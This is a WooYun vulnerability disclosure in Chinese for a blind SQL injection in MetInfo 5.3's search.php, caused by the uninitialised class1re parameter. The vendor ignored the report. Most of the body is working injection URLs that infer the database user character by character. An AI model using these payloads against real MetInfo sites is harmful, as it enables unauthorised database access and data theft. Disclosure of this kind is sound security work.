漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-04-09:	细节已通知厂商并且等待厂商处理中
									2015-04-14:	厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
									2015-06-08:	细节向核心白帽子及相关领域专家公开
									2015-06-18:	细节向普通白帽子公开
									2015-06-28:	细节向实习白帽子公开
									2015-07-13:	细节向公众公开
								
简要描述:
MetInfo5.3 最新版本SQL注射
详细说明:
search.php:
由于$class1re 没有进行初始化,所以全局只需要越过
这一条逻辑即可:
发送url:
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=1&searchword=1&lang=cn&class1re=xxxxxx
抓取sql语句为:
2015/4/8 14:39	SELECT COUNT(*) FROM met_news where lang='cn' and (recycle='0' or recycle='-1') and displaytype='1' and ( class1='2' xxxxxx)  and title like '%1%'
然后进行构造
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=1-- sd
页面是:
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=2-- sd
payload:
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=$NUM,1,0)-- sd
根据页面变化 补充$NUM
来进行敏感信息猜测
由于我这里是root
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=114,1,0)-- sd
页面里面没有xxxxxx
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=1141,1,0)-- sd
页面里面有xxxxx 
漏洞证明:
修复方案:
版权声明:转载请注明来源 魔鬼的步伐@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-07-13 16:10
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无

 
                 
                        
